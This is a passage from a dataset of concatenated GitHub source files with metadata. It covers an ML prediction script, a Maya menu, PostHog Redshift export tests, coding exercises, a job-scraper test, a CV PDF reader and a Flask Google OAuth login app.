word2vec.Word2Vec.load(\"word2vec_256.model\")\n\ntemp = []\nv = np.zeros(256)\nfor line in table:\n\ttempl = []\n\tfor word in line:\n\t\tif word in model:\n\t\t\ttempl.append(model[word])\n\t\t\n\ttempl = np.array(templ)\t\n\ttemp.append(templ)\n\ntest_x = pad_sequences(temp, maxlen=48, dtype='int32', padding='post', truncating='post', value=model[' '])\n\nmodel = load_model(\"model.h5\")\ny_predict = model.predict(test_x)\n\nran = len(y_predict)\nfor i in range(ran):\n\tif y_predict[i] > 
0.5:\n\t\ty_predict[i] = 1\n\telse:\n\t\ty_predict[i] = 0\ny_predict = y_predict.astype(int)\n\nindex = np.array([[str(i)] for i in range(ran)])\nsolution = np.hstack((index, y_predict))\nsolution = pd.DataFrame(solution)\nsolution.columns = ['id' , 'label']\nsolution.to_csv(sys.argv[3] , columns = ['id' , 'label'] , index = False , sep = ',')","repo_name":"jacksukk/ML2018FALL","sub_path":"hw4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010442407","text":"# -*- coding: utf-8 -*-\n\n# mbox\nimport mbox\n\n# mgear\nimport mgear.menu\n\n\ndef install():\n \"\"\"\n\n \"\"\"\n commands = (\n (\"Manager\", str_manager),\n (\"\", None),\n (\"Settings\", str_settings),\n (\"Extract Controls\", str_extract_controls),\n (\"\", None),\n (\"Build from selection\", str_build_from_selection),\n (\"Build from blueprint\", str_build_from_blueprint),\n (\"\", None),\n (\"Import blueprint\", str_import_blueprint),\n (\"Export blueprint\", str_export_blueprint),\n (\"\", None),\n (\"Reload lego box\", str_reload_lego_box)\n )\n mgear.menu.install(\"Lego\", commands, parent=mbox.menu_id)\n\n\nstr_manager = \"\"\"\nfrom mbox.lego import manager\nmanager.show_manager()\"\"\"\n\nstr_settings = \"\"\"\nfrom mbox.lego import lib\nlib.inspect_settings()\"\"\"\n\nstr_extract_controls = \"\"\"\nfrom mbox.lego import lib\nlib.extract_controls()\"\"\"\n\nstr_build_from_selection = \"\"\"\n\"\"\"\n\nstr_build_from_blueprint = \"\"\"\n\"\"\"\n\nstr_import_blueprint = \"\"\"\nfrom mbox.lego import lib\nlib.import_blueprint(None)\"\"\"\n\nstr_export_blueprint = \"\"\"\nfrom mbox.lego import lib\nlib.export_blueprint(None, None)\"\"\"\n\nstr_reload_lego_box = \"\"\"\n\"\"\"","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/lego/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513626519","text":"import datetime as dt\nimport json\nimport os\nimport warnings\nfrom random import randint\nfrom uuid import uuid4\n\nimport psycopg\nimport pytest\nimport pytest_asyncio\nfrom django.conf import settings\nfrom django.test import override_settings\nfrom psycopg import sql\nfrom temporalio.common import RetryPolicy\nfrom temporalio.testing import WorkflowEnvironment\nfrom temporalio.worker import UnsandboxedWorkflowRunner, Worker\n\nfrom posthog.temporal.batch_exports.batch_exports import (\n create_export_run,\n update_export_run_status,\n)\nfrom posthog.temporal.batch_exports.redshift_batch_export import (\n RedshiftBatchExportInputs,\n RedshiftBatchExportWorkflow,\n RedshiftInsertInputs,\n insert_into_redshift_activity,\n remove_escaped_whitespace_recursive,\n)\nfrom posthog.temporal.tests.utils.events import generate_test_events_in_clickhouse\nfrom posthog.temporal.tests.utils.models import (\n acreate_batch_export,\n adelete_batch_export,\n afetch_batch_export_runs,\n)\n\nREQUIRED_ENV_VARS = (\n \"REDSHIFT_USER\",\n \"REDSHIFT_PASSWORD\",\n \"REDSHIFT_HOST\",\n)\n\nMISSING_REQUIRED_ENV_VARS = any(env_var not in os.environ for env_var in REQUIRED_ENV_VARS)\n\n\npytestmark = [pytest.mark.django_db, pytest.mark.asyncio]\n\n\nasync def assert_events_in_redshift(connection, schema, table_name, events, exclude_events: list[str] | None = None):\n \"\"\"Assert provided events written to a given Redshift table.\"\"\"\n\n inserted_events = []\n\n async with 
connection.cursor() as cursor:\n await cursor.execute(\n sql.SQL(\"SELECT * FROM {} ORDER BY event, timestamp\").format(sql.Identifier(schema, table_name))\n )\n columns = [column.name for column in cursor.description]\n\n for row in await cursor.fetchall():\n event = dict(zip(columns, row))\n event[\"timestamp\"] = dt.datetime.fromisoformat(event[\"timestamp\"].isoformat())\n inserted_events.append(event)\n\n expected_events = []\n for event in events:\n event_name = event.get(\"event\")\n\n if exclude_events is not None and event_name in exclude_events:\n continue\n\n raw_properties = event.get(\"properties\", None)\n properties = remove_escaped_whitespace_recursive(raw_properties) if raw_properties else None\n expected_event = {\n \"distinct_id\": event.get(\"distinct_id\"),\n \"elements\": \"\",\n \"event\": event_name,\n \"ip\": properties.get(\"$ip\", None) if properties else None,\n \"properties\": json.dumps(properties, ensure_ascii=False) if properties else None,\n \"set\": properties.get(\"$set\", None) if properties else None,\n \"set_once\": properties.get(\"$set_once\", None) if properties else None,\n # Kept for backwards compatibility, but not exported anymore.\n \"site_url\": \"\",\n # For compatibility with CH which doesn't parse timezone component, so we add it here assuming UTC.\n \"timestamp\": dt.datetime.fromisoformat(event.get(\"timestamp\") + \"+00:00\"),\n \"team_id\": event.get(\"team_id\"),\n \"uuid\": event.get(\"uuid\"),\n }\n expected_events.append(expected_event)\n\n expected_events.sort(key=lambda x: (x[\"event\"], x[\"timestamp\"]))\n\n assert len(inserted_events) == len(expected_events)\n # First check one event, the first one, so that we can get a nice diff if\n # the included data is different.\n assert inserted_events[0] == expected_events[0]\n assert inserted_events == expected_events\n\n\n@pytest.fixture\ndef redshift_config():\n \"\"\"Fixture to provide a default configuration for Redshift batch exports.\n\n Reads required env vars to construct configuration, but if not present\n we default to local development PostgreSQL database, which should be mostly compatible.\n \"\"\"\n if MISSING_REQUIRED_ENV_VARS:\n user = settings.PG_USER\n password = settings.PG_PASSWORD\n host = settings.PG_HOST\n port = int(settings.PG_PORT)\n warnings.warn(\"Missing required Redshift env vars. 
Running tests against local PG database.\", stacklevel=1)\n\n else:\n user = os.environ[\"REDSHIFT_USER\"]\n password = os.environ[\"REDSHIFT_PASSWORD\"]\n host = os.environ[\"REDSHIFT_HOST\"]\n port = os.environ.get(\"REDSHIFT_PORT\", \"5439\")\n\n return {\n \"user\": user,\n \"password\": password,\n \"database\": \"posthog_batch_exports_test_2\",\n \"schema\": \"exports_test_schema\",\n \"host\": host,\n \"port\": int(port),\n }\n\n\n@pytest.fixture\ndef postgres_config(redshift_config):\n \"\"\"We shadow this name so that setup_postgres_test_db works with Redshift.\"\"\"\n psycopg._encodings._py_codecs[\"UNICODE\"] = \"utf-8\"\n psycopg._encodings.py_codecs.update((k.encode(), v) for k, v in psycopg._encodings._py_codecs.items())\n\n yield redshift_config\n\n\n@pytest_asyncio.fixture\nasync def psycopg_connection(redshift_config, setup_postgres_test_db):\n \"\"\"Fixture to manage a psycopg2 connection.\"\"\"\n connection = await psycopg.AsyncConnection.connect(\n user=redshift_config[\"user\"],\n password=redshift_config[\"password\"],\n dbname=redshift_config[\"database\"],\n host=redshift_config[\"host\"],\n port=redshift_config[\"port\"],\n )\n connection.prepare_threshold = None\n\n yield connection\n\n await connection.close()\n\n\n@pytest.mark.parametrize(\"exclude_events\", [None, [\"test-exclude\"]], indirect=True)\nasync def test_insert_into_redshift_activity_inserts_data_into_redshift_table(\n clickhouse_client, activity_environment, psycopg_connection, redshift_config, exclude_events\n):\n \"\"\"Test that the insert_into_redshift_activity function inserts data into a Redshift table.\n\n We use the generate_test_events_in_clickhouse function to generate several sets\n of events. Some of these sets are expected to be exported, and others not. Expected\n events are those that:\n * Are created for the team_id of the batch export.\n * Are created in the date range of the batch export.\n * Are not duplicates of other events that are in the same batch.\n * Do not have an event name contained in the batch export's exclude_events.\n\n Once we have these events, we pass them to the assert_events_in_redshift function to check\n that they appear in the expected Redshift table.\n \"\"\"\n data_interval_start = dt.datetime(2023, 4, 20, 14, 0, 0, tzinfo=dt.timezone.utc)\n data_interval_end = dt.datetime(2023, 4, 25, 15, 0, 0, tzinfo=dt.timezone.utc)\n\n # Generate a random team id integer. 
There's still a chance of a collision,\n # but it's very small.\n team_id = randint(1, 1000000)\n\n (events, _, _) = await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=1000,\n count_outside_range=10,\n count_other_team=10,\n duplicate=True,\n properties={\n \"$browser\": \"Chrome\",\n \"$os\": \"Mac OS X\",\n \"whitespace\": \"hi\\t\\n\\r\\f\\bhi\",\n \"nested_whitespace\": {\"whitespace\": \"hi\\t\\n\\r\\f\\bhi\"},\n \"sequence\": {\"mucho_whitespace\": [\"hi\", \"hi\\t\\n\\r\\f\\bhi\", \"hi\\t\\n\\r\\f\\bhi\", \"hi\"]},\n \"multi-byte\": \"é\",\n },\n person_properties={\"utm_medium\": \"referral\", \"$initial_os\": \"Linux\"},\n )\n\n (events_with_no_properties, _, _) = await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n properties=None,\n person_properties=None,\n )\n\n if exclude_events:\n for event_name in exclude_events:\n await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=team_id,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n event_name=event_name,\n )\n\n insert_inputs = RedshiftInsertInputs(\n team_id=team_id,\n table_name=\"test_table\",\n data_interval_start=data_interval_start.isoformat(),\n data_interval_end=data_interval_end.isoformat(),\n exclude_events=exclude_events,\n **redshift_config,\n )\n\n await activity_environment.run(insert_into_redshift_activity, insert_inputs)\n\n await assert_events_in_redshift(\n connection=psycopg_connection,\n schema=redshift_config[\"schema\"],\n table_name=\"test_table\",\n events=events + events_with_no_properties,\n exclude_events=exclude_events,\n )\n\n\n@pytest.fixture\ndef table_name(ateam, interval):\n return f\"test_workflow_table_{ateam.pk}_{interval}\"\n\n\n@pytest_asyncio.fixture\nasync def redshift_batch_export(ateam, table_name, redshift_config, interval, exclude_events, temporal_client):\n destination_data = {\n \"type\": \"Redshift\",\n \"config\": {**redshift_config, \"table_name\": table_name, \"exclude_events\": exclude_events},\n }\n batch_export_data = {\n \"name\": \"my-production-redshift-export\",\n \"destination\": destination_data,\n \"interval\": interval,\n }\n\n batch_export = await acreate_batch_export(\n team_id=ateam.pk,\n name=batch_export_data[\"name\"],\n destination_data=batch_export_data[\"destination\"],\n interval=batch_export_data[\"interval\"],\n )\n\n yield batch_export\n\n await adelete_batch_export(batch_export, temporal_client)\n\n\n@pytest.mark.parametrize(\"interval\", [\"hour\", \"day\"], indirect=True)\n@pytest.mark.parametrize(\"exclude_events\", [None, [\"test-exclude\"]], indirect=True)\nasync def test_redshift_export_workflow(\n clickhouse_client,\n redshift_config,\n psycopg_connection,\n interval,\n redshift_batch_export,\n ateam,\n exclude_events,\n table_name,\n):\n \"\"\"Test Redshift Export Workflow end-to-end.\n\n The workflow should update the batch export run status to completed and produce the expected\n records to the provided Redshift instance.\n \"\"\"\n data_interval_end = dt.datetime.fromisoformat(\"2023-04-25T14:30:00.000000+00:00\")\n data_interval_start = data_interval_end - redshift_batch_export.interval_time_delta\n\n (events, _, _) = await generate_test_events_in_clickhouse(\n 
client=clickhouse_client,\n team_id=ateam.pk,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=100,\n count_outside_range=10,\n count_other_team=10,\n duplicate=True,\n properties={\"$browser\": \"Chrome\", \"$os\": \"Mac OS X\"},\n person_properties={\"utm_medium\": \"referral\", \"$initial_os\": \"Linux\"},\n )\n\n if exclude_events:\n for event_name in exclude_events:\n await generate_test_events_in_clickhouse(\n client=clickhouse_client,\n team_id=ateam.pk,\n start_time=data_interval_start,\n end_time=data_interval_end,\n count=5,\n count_outside_range=0,\n count_other_team=0,\n event_name=event_name,\n )\n\n workflow_id = str(uuid4())\n inputs = RedshiftBatchExportInputs(\n team_id=ateam.pk,\n batch_export_id=str(redshift_batch_export.id),\n data_interval_end=\"2023-04-25 14:30:00.000000\",\n interval=interval,\n **redshift_batch_export.destination.config,\n )\n\n async with await WorkflowEnvironment.start_time_skipping() as activity_environment:\n async with Worker(\n activity_environment.client,\n task_queue=settings.TEMPORAL_TASK_QUEUE,\n workflows=[RedshiftBatchExportWorkflow],\n activities=[\n create_export_run,\n insert_into_redshift_activity,\n update_export_run_status,\n ],\n workflow_runner=UnsandboxedWorkflowRunner(),\n ):\n with override_settings(BATCH_EXPORT_REDSHIFT_UPLOAD_CHUNK_SIZE_BYTES=5 * 1024**2):\n await activity_environment.client.execute_workflow(\n RedshiftBatchExportWorkflow.run,\n inputs,\n id=workflow_id,\n task_queue=settings.TEMPORAL_TASK_QUEUE,\n retry_policy=RetryPolicy(maximum_attempts=1),\n execution_timeout=dt.timedelta(seconds=10),\n )\n\n runs = await afetch_batch_export_runs(batch_export_id=redshift_batch_export.id)\n assert len(runs) == 1\n\n run = runs[0]\n assert run.status == \"Completed\"\n\n await assert_events_in_redshift(\n psycopg_connection,\n redshift_config[\"schema\"],\n table_name,\n events=events,\n exclude_events=exclude_events,\n )\n\n\n@pytest.mark.parametrize(\n \"value,expected\",\n [\n ([1, 2, 3], [1, 2, 3]),\n (\"hi\\t\\n\\r\\f\\bhi\", \"hi hi\"),\n ([[\"\\t\\n\\r\\f\\b\"]], [[\"\"]]),\n ((\"\\t\\n\\r\\f\\b\",), (\"\",)),\n ({\"\\t\\n\\r\\f\\b\"}, {\"\"}),\n ({\"key\": \"\\t\\n\\r\\f\\b\"}, {\"key\": \"\"}),\n ({\"key\": [\"\\t\\n\\r\\f\\b\"]}, {\"key\": [\"\"]}),\n ],\n)\ndef test_remove_escaped_whitespace_recursive(value, expected):\n \"\"\"Test we remove some whitespace values.\"\"\"\n assert remove_escaped_whitespace_recursive(value) == expected\n","repo_name":"PostHog/posthog","sub_path":"posthog/temporal/tests/batch_exports/test_redshift_batch_export_workflow.py","file_name":"test_redshift_batch_export_workflow.py","file_ext":"py","file_size_in_byte":13416,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"33447636167","text":"#!/usr/bin/python2.7\nimport re\n\nnum_inputs = 0\nall_ins = []\nnumber_pattern = re.compile('([7-9][0-9]{9})')\ndef main():\n num_inputs = getNumInputs()\n all_ins = getInputs(num_inputs)\n done(all_ins)\ndef getNumInputs():\n return int(raw_input())\ndef getInputs(num_inputs):\n for i in range(0,num_inputs):\n inp = str(raw_input())\n all_ins.append(parse(inp))\n return all_ins\ndef parse(inp):\n\tif(len(inp)>10):\n\t\treturn \"NO\"\n\telif(number_pattern.match(inp)):\n\t\treturn \"YES\"\n\telse:\n\t\treturn \"NO\"\n\ndef done(all_ins):\n\tfor s in 
all_ins:\n\t\tprint(s)\nmain()\n","repo_name":"dscottboggs/practice","sub_path":"HackerRank/phoneNumbers/phoneNumbers2.py","file_name":"phoneNumbers2.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11754093512","text":"def count_unclear_player(stages, n):\n # return how many entries in stages are exactly equal to n\n try:\n start = stages.index(n)\n except ValueError:\n return 0\n end_index = start\n for i in range(start, len(stages)):\n end_index = i\n if stages[i] > n:\n end_index = i - 1\n break\n return end_index - start + 1\n\n\ndef count_instage_player(stages, n):\n # return how many entries in stages are greater than or equal to n\n try:\n start = stages.index(n)\n except ValueError:\n return 0\n return len(stages) - start\n\n\ndef solution(N, stages):\n answer = []\n for i in range(N):\n answer.append(list([0,i+1]))\n stages.sort()\n for i in range(1, len(answer) + 1):\n instage = count_instage_player(stages, i)\n unclear = count_unclear_player(stages, i)\n if instage == 0:\n answer[i - 1][0] = 0\n else:\n answer[i - 1][0] = unclear / instage\n answer.sort(key = lambda x: (-x[0], x[1]))\n result = list(map(lambda x: x[1], answer))\n return result\n\nprint(solution(5,[2,1,2,6,2,4,3,3]))","repo_name":"ybkim-dev/algorithms","sub_path":"기출문제/정렬 문제/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14767423506","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nfrom utils.soundex import get_soundex\n\nclass TierCities:\n def __init__(self):\n self.url=\"https://en.wikipedia.org/wiki/Classification_of_Indian_cities\"\n self.tier_cities = None\n self.synonym_names = {}\n self.soundex_dict_tier = {}\n self.prepareValidCityList()\n self.find_synonym()\n\n def prepareValidCityList(self):\n r = requests.get(self.url,verify=False)\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n tier_cities=list(map(lambda x:x.text.lower(),soup.find('table',class_='wikitable').find_all('a')))\n\n self.soundex_dict_tier={get_soundex(name):name for name in tier_cities}\n\n def find_synonym(self):\n url = 'https://www.scoopwhoop.com/news/whats-in-a-name/#.45rdcz1m2'\n r=requests.get(url,verify=False)\n containers=BeautifulSoup(r.text,'html.parser').find('div',class_='article-body').find_all('h2')\n\n for container in containers:\n if re.search(r'^[0-9]{1,2}.+', container.text.strip()):\n self.synonym_names[container.text.strip().split()[1].lower()] = container.text.strip().split()[-1].lower()\n\n self.soundex_dict_syn={get_soundex(key):self.synonym_names[key] for key in self.synonym_names}\n\n def validate_city(self, city_name):\n city_name = city_name.lower()\n loc_soundex=get_soundex(city_name)\n val=False\n if loc_soundex in self.soundex_dict_tier.keys():\n val=True\n city_name= self.soundex_dict_tier[loc_soundex]\n if loc_soundex in self.soundex_dict_syn.keys() and not val:\n val=True\n city_name= self.soundex_dict_syn[loc_soundex]\n\n return val, city_name\n\n\n\nif __name__ == '__main__':\n I = TierCities()\n I.validate_city('allahabad')\n","repo_name":"BharathSD/RestaurantSearch_ChatBot","sub_path":"utils/extractTierCities.py","file_name":"extractTierCities.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37315823892","text":"\"\"\"\n83. 
Remove Duplicates from Sorted List\nYou are given the head of a linked list sorted in ascending order. Delete all duplicate elements so that each element appears only once.\nReturn the resulting linked list, still sorted in ascending order.\n\nExample 1:\nInput: head = [1,1,2]\nOutput: [1,2]\n\nExample 2:\nInput: head = [1,1,2,3,3]\nOutput: [1,2,3]\n\nConstraints:\nThe number of nodes in the list is in the range [0, 300].\n-100 <= Node.val <= 100\nThe list is guaranteed to be sorted in ascending order.\n\ndate: 2021-03-26\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n dum_head = ListNode(-1, head)\n cur = dum_head.next\n while cur:\n next_n = cur.next\n if not next_n: break\n if cur.val == next_n.val:\n while next_n and cur.val == next_n.val:\n next_n = next_n.next\n cur.next = next_n\n else:\n cur = cur.next\n return dum_head.next\n\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/083. 删除排序链表中的重复元素.py","file_name":"083. 删除排序链表中的重复元素.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12127201895","text":"import pytest\nimport requests\nfrom unittest.mock import patch\nfrom job_scrapper import JobScraper, Level, NoListingException\n\n@pytest.fixture\ndef mock_get_request():\n with patch('requests.get') as mock_get:\n yield mock_get\n\ndef test_get_job_ids(mock_get_request):\n # Mock the requests.get method to return the correct response body\n mock_response = mock_get_request.return_value\n mock_response.status_code = 200\n mock_response.text = \"\"\"\n 
<ul class=\"jobs-search__results-list\">\n <li>\n <div class=\"base-card\" data-entity-urn=\"urn:li:jobPosting:3645698557\"></div>\n </li>\n <li>\n <div class=\"base-card\" data-entity-urn=\"urn:li:jobPosting:3645757263\"></div>\n </li>\n </ul>\n \"\"\"\n\n # Call the method that uses requests.get\n job_scraper = JobScraper(\"test\", False, Level.ENTRY, \"day\")\n job_ids = job_scraper.get_job_ids(2)\n\n # Assertions\n assert isinstance(job_ids, list)\n assert len(job_ids) == 2\n assert job_ids == [\"3645698557\", \"3645757263\"]\n \n\ndef test_get_job_ids_no_result(mock_get_request):\n # Mock the requests.get method to return the correct response body\n mock_response = mock_get_request.return_value\n mock_response.status_code = 200\n mock_response.text = \"\"\"\n <ul class=\"jobs-search__results-list\">\n </ul>\n \"\"\"\n\n # Assertions\n job_scraper = JobScraper(\"test\", False, Level.ENTRY, \"day\")\n with pytest.raises(NoListingException):\n job_scraper.get_job_ids(2)","repo_name":"jyl0725/job-scrapper","sub_path":"test/test_job_seeker.py","file_name":"test_job_seeker.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7091355067","text":"#dictionary class that keeps track of all words in a given language as well as assigning a\r\n#token to them\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#from pytorch's documentation website on NLP\r\nclass Dictionary:\r\n def __init__(self, name):\r\n self.name = name\r\n self.word2index = {}\r\n self.word2count = {}\r\n self.index2word = {PAD_TOKEN: \"PAD\", SOS_TOKEN: \"SOS\", EOS_TOKEN: \"EOS\"}\r\n self.n_count = 3\r\n\r\n def add_sentence(self, sentence):\r\n for word in sentence.split(' '):\r\n self.add_word(word)\r\n\r\n def add_word(self, word):\r\n if word not in self.word2index:\r\n self.word2index[word] = self.n_count\r\n self.word2count[word] = 1\r\n self.index2word[self.n_count] = word \r\n self.n_count += 1\r\n else:\r\n self.word2count[word] += 1\r\n","repo_name":"u7javed/Transformer-Multi-Language-Translator","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"14842630457","text":"# import modules\nimport os\nfrom PyPDF2 import PdfReader\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Define a class to read CVs from a directory\nclass CVsReader:\n \n # Initialize the class with the directory path where CVs are located\n def __init__(self, cvs_directory_path):\n self.cvs_directory_path = cvs_directory_path\n\n\n # Method to read new CV files from the given directory\n def _read_new_directory_files(self):\n\n # Store the directory path of CVs\n cvs_directory_path = self.cvs_directory_path\n\n # Store the path of the CSV file where previously extracted CVs are stored\n previously_extracted_cvs_path = '../Output/CVs_Info_Extracted.csv'\n\n # Get a list of all files in the CVs directory\n all_cvs = os.listdir(cvs_directory_path)\n\n # If there is a CSV file of previously extracted CVs\n if os.path.isfile(previously_extracted_cvs_path):\n\n # Read that file and get the filenames of CVs\n previously_extracted_cvs = pd.read_csv(previously_extracted_cvs_path, usecols = ['CV_Filename'])\n\n # Convert those filenames to a list\n previously_extracted_cvs = previously_extracted_cvs.CV_Filename.to_list()\n\n # Filter out the CVs that have already been processed\n all_cvs = [cv for cv in all_cvs if cv not in previously_extracted_cvs]\n\n # Print the number of CVs that are left to be processed\n print(f'Number of CVs to be processed: {len(all_cvs)}')\n\n # Return the list of CVs to be processed\n return all_cvs\n\n\n # Method to extract 
text from a PDF file\n def _extract_text_from_pdf(self, pdf_path):\n\n # Print the name of the file being processed\n print(f\"Extracting text from file: {pdf_path}\")\n\n # Create a PdfReader object\n pdf = PdfReader(pdf_path)\n\n # Initialize an empty string to store the extracted text\n text = ''\n\n # Loop over the pages in the pdf\n for page in range(len(pdf.pages)):\n\n # Extract text from each page and append it to the text string\n text += pdf.pages[page].extract_text()\n\n # Return the extracted text\n return text\n\n \n # Define a method that reads PDF content from a directory\n def _read_pdfs_content_from_directory(self, directory_path):\n \n # Initialize a dictionary to hold the filenames and contents of the CVs\n data = {'CV_Filename': [], 'CV_Content': []}\n \n # Read all the new files in the directory\n all_cvs = self._read_new_directory_files()\n \n # For each file in the directory\n for filename in tqdm(all_cvs, desc='CVs'):\n # If the file is a PDF\n if filename.endswith('.pdf'):\n # Construct the full file path\n file_path = os.path.join(directory_path, filename)\n try:\n # Extract the text content from the PDF\n content = self._extract_text_from_pdf(file_path)\n # Add the filename to the dictionary\n data['CV_Filename'].append(filename)\n # Add the content to the dictionary\n data['CV_Content'].append(content)\n except Exception as e:\n # Print the exception if there is an error in reading the file\n print(f\"Error reading file {filename}: {e}\")\n # Return the data as a DataFrame\n return pd.DataFrame(data)\n\n\n # Define a method that reads and cleans CVs\n def read_cv(self):\n \n # Print a message indicating the start of the CV extraction process\n print('---- Excecuting CVs Content Extraction Process ----')\n \n # Read the PDFs from the directory and store their content in a DataFrame\n df = self._read_pdfs_content_from_directory(self.cvs_directory_path)\n \n # Print a message indicating the start of the CV content cleaning process\n print('Cleaning CVs Content...')\n # Clean the CV content by replacing newline characters and trailing spaces with a single newline character\n df['CV_Content'] = df['CV_Content'].str.replace(r\"\\n(?:\\s*)\", \"\\n\", regex=True)\n\n # Print a message indicating the end of the CV extraction process\n print('CVs Content Extraction Process Completed!')\n print('----------------------------------------------')\n # Return the DataFrame\n return df","repo_name":"Aillian/ResumeGPT","sub_path":"ResumeGPT/OCR_Reader.py","file_name":"OCR_Reader.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"14347110943","text":"# Python standard libraries\r\nimport json\r\nimport os\r\nimport sqlite3\r\n\r\n# Third-party libraries\r\nfrom flask import Flask, render_template, redirect, request, url_for\r\nfrom flask_login import (\r\n LoginManager,\r\n current_user,\r\n login_required,\r\n login_user,\r\n logout_user,\r\n)\r\nfrom oauthlib.oauth2 import WebApplicationClient\r\nimport requests\r\n\r\n# Internal imports\r\nfrom db import init_db_command\r\nfrom user import User\r\n\r\n# .env\r\nfrom dotenv import load_dotenv\r\nload_dotenv('.env')\r\n\r\nGOOGLE_CLIENT_ID = os.getenv('GOOGLE_CLIENT_ID')\r\nGOOGLE_CLIENT_SECRET = os.getenv('GOOGLE_CLIENT_SECRET')\r\nGOOGLE_DISCOVERY_URL = \"https://accounts.google.com/.well-known/openid-configuration\"\r\n\r\napp = Flask(__name__)\r\napp.secret_key = os.urandom(24)\r\ndb_name = 
\"database/UberNeeds.db\"\r\n\r\n# User session management setup\r\n# https://flask-login.readthedocs.io/en/latest\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\n# Naive database setup\r\ntry:\r\n init_db_command()\r\nexcept sqlite3.OperationalError:\r\n # Assume it's already been created\r\n pass\r\n\r\n# OAuth 2 client setup\r\nclient = WebApplicationClient(GOOGLE_CLIENT_ID)\r\n\r\n# Flask-Login helper to retrieve a user from our db\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.get(user_id)\r\n\r\n@app.route(\"/\")\r\ndef homepage():\r\n\treturn render_template(\"homepage.html\", google_user=current_user)\r\n\r\ndef get_google_provider_cfg():\r\n return requests.get(GOOGLE_DISCOVERY_URL).json()\r\n\r\n@app.route(\"/login\")\r\ndef login():\r\n\t# return render_template(\"login.html\")\r\n\r\n\t# Find out what URL to hit for Google login\r\n google_provider_cfg = get_google_provider_cfg()\r\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\r\n\r\n # Use library to construct the request for Google login and provide\r\n # scopes that let you retrieve user's profile from Google\r\n request_uri = client.prepare_request_uri(\r\n authorization_endpoint,\r\n redirect_uri=request.base_url + \"/callback\",\r\n scope=[\"openid\", \"email\", \"profile\"],\r\n )\r\n return redirect(request_uri)\r\n\r\n@app.route(\"/login/callback\")\r\ndef callback():\r\n # Get authorization code Google sent back to you\r\n code = request.args.get(\"code\")\r\n\r\n # Find out what URL to hit to get tokens that allow you to ask for\r\n # things on behalf of a user\r\n google_provider_cfg = get_google_provider_cfg()\r\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\r\n\r\n # Prepare and send a request to get tokens! Yay tokens!\r\n token_url, headers, body = client.prepare_token_request(\r\n token_endpoint,\r\n authorization_response=request.url,\r\n redirect_url=request.base_url,\r\n code=code\r\n )\r\n token_response = requests.post(\r\n token_url,\r\n headers=headers,\r\n data=body,\r\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),\r\n )\r\n\r\n # Parse the tokens!\r\n client.parse_request_body_response(json.dumps(token_response.json()))\r\n\r\n # Now that you have tokens (yay) let's find and hit the URL\r\n # from Google that gives you the user's profile information,\r\n # including their Google profile image and email\r\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\r\n uri, headers, body = client.add_token(userinfo_endpoint)\r\n userinfo_response = requests.get(uri, headers=headers, data=body)\r\n\r\n # You want to make sure their email is verified.\r\n # The user authenticated with Google, authorized your\r\n # app, and now you've verified their email through Google!\r\n if userinfo_response.json().get(\"email_verified\"):\r\n unique_id = userinfo_response.json()[\"sub\"]\r\n users_email = userinfo_response.json()[\"email\"]\r\n picture = userinfo_response.json()[\"picture\"]\r\n users_name = userinfo_response.json()[\"given_name\"]\r\n else:\r\n return \"User email not available or not verified by Google.\", 400\r\n\r\n # Create a user in your db with the information provided\r\n # by Google\r\n user = User(\r\n id_=unique_id, name=users_name, email=users_email, profile_pic=picture\r\n )\r\n\r\n # Doesn't exist? 
